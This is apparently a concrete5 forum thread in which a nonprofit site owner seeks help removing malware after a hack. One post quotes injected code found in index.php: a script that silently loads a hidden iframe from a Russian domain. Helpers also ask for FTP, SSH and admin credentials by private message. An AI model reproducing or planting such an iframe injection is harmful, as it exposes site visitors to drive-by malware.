Malware on my C5?
Permalink
I've been seeing this error
http://screencast.com/t/5yoK5sqEWYf...
I have a report into my host to help me look. but so far everyone is saying to check my code.
How exactly does a person check every page visually in C5???
Is their a way to search or find this easier?
I was hacked a month back. just seems to appear now.
Please help. I'd even be willing to hire someone to secure my site.
Thank You.
http://screencast.com/t/5yoK5sqEWYf...
I have a report into my host to help me look. but so far everyone is saying to check my code.
How exactly does a person check every page visually in C5???
Is their a way to search or find this easier?
I was hacked a month back. just seems to appear now.
Please help. I'd even be willing to hire someone to secure my site.
Thank You.
Thank you.
I'll be reading through that. but every folder on my site was "last modifed" within the last 2 or 3 days. so I'll bet I've been hammared hard.
I found that remove string software. maybe I'll take a look at it.
Quotes I've seen for fixing this are in the hundred's of dollars :( We are a none profit group..
Thanks
I'll be reading through that. but every folder on my site was "last modifed" within the last 2 or 3 days. so I'll bet I've been hammared hard.
I found that remove string software. maybe I'll take a look at it.
Quotes I've seen for fixing this are in the hundred's of dollars :( We are a none profit group..
Thanks
Found this in the index.php
And that remove program failed to even open for me.
I'm unsure how much of that I can delete without ruining the website :(
#afa977# echo " <script type=\"text/javascript\" language=\"javascript\" > (function(){ var a = document.createElement('iframe'); a.src = 'http://zaefofin.ru/count8.php'; a.style.position = 'absolute'; a.style.border = '0'; a.style.height = '2px'; a.style.width = '2px'; a.style.left = '1px'; a.style.top = '1px'; if(!document.getElementById('mira')) { document.write('<div id=\'mira\'></div>'); document.getElementById('mira').appendChild(a); }})();</script>"; #/afa977#
And that remove program failed to even open for me.
I'm unsure how much of that I can delete without ruining the website :(
I can take a look at it if you are willing to pm me your ftp details to your host.
I see what the problem is. Every single folder is infected. If you can pm me once you tell your host you need ssh access to your folders, it will go much quicker for me to remove the infection. Let me know when this is done. I won't be up much longer as it is almost midnight here.
Thanks
Thanks
As far as I know SSh is enabled? I will see if there is an option but I'm not seeing it.
John. I've done that. but now the site's acting stupid. the back ground image on Firefox seems to overlay over my content, even though I see the content. and does not allow me to click on anything.
I'm unsure how damaged this site is. and it seems my last update was also infected. otherwise I go back months.
Edit:
Nothing's even clickable on my /login/ page within firefox. I.E. is also acting weird.
John. I've done that. but now the site's acting stupid. the back ground image on Firefox seems to overlay over my content, even though I see the content. and does not allow me to click on anything.
I'm unsure how damaged this site is. and it seems my last update was also infected. otherwise I go back months.
Edit:
Nothing's even clickable on my /login/ page within firefox. I.E. is also acting weird.
I tried to SSH into it but it tells me its disabled then logs me out. I know what the problem is. It has put the infected files in every folder. It will be easier to remove them all if I can SSH because I can run a command that will pull them all out versus having to go in each folder like I was last night one by one. Call up your host and ask them to enable SSH for you.
Let me know. Thanks.
Let me know. Thanks.
Yes I'm sorry I see it now.
Shell account - allows SFTP/FTP plus ssh access.
Enabled. Sorry
Shell account - allows SFTP/FTP plus ssh access.
Enabled. Sorry
No need for apologies. Just glad you found it. Thanks! Will let you know shortly.
I may have to wait a few minutes as it hasn't allowed SSH just yet.
I may have to wait a few minutes as it hasn't allowed SSH just yet.
As well as cleaning up the infected files, you need to close whatever mechanism allowed the site to become infected. Without preventing future infection, after any cleanup it will simply happen again.
If you PM me the FTP detials I can fix it.
Thank you for the offer. Someone's already in looking at it for me. I think two of you in there would cause more trouble for you guys. If he is unable to figure out the site issue I will contact you.
Thank you!
Sent from my iPhone
Thank you!
Sent from my iPhone
Your site is back up and running and all the links at the top are working again.
If I have been helpful, please mark my answer as so.
Thanks Shawn!
--Jeremy
If I have been helpful, please mark my answer as so.
Thanks Shawn!
--Jeremy
the home page is loading with an error, and won't load my admin tool bar up top. Any idea why it may be doing that?
Thank you again. I think all the malware is gone. I hope.
Thank you again. I think all the malware is gone. I hope.
I don't get an error message when viewing your site from my computer nor my phone. Try clearing cache and see if that helps.
When I am logged in as admin the top tool bar is blank, and if I try going to site map and click on a page I get no pop up and can't seem too create or edit pages.
Any idea why that would be gone? I'm thinking something got removed maybe?
Any idea why that would be gone? I'm thinking something got removed maybe?
I only removed the same six infected files from every folder and none of them are c5 files. They were tracking and script files. PM the backend credentials and I will see if I can figure something out.
Oh I don't think you did anything. It may have been me or. Who know's. I'll send you my admin login details now.
Thank You again!
Thank You again!
I would download your whole site then do a search for "<script" in something dreamweaver.
You will finds something like this on the site:http://sophosnews.files.wordpress.com/2012/02/iframe-w-code.jpg?w=640
More than likely and it is normally on a index.html, default.html file.
Have a read of this
http://www.squidoo.com/how-to-find-a-malware-script...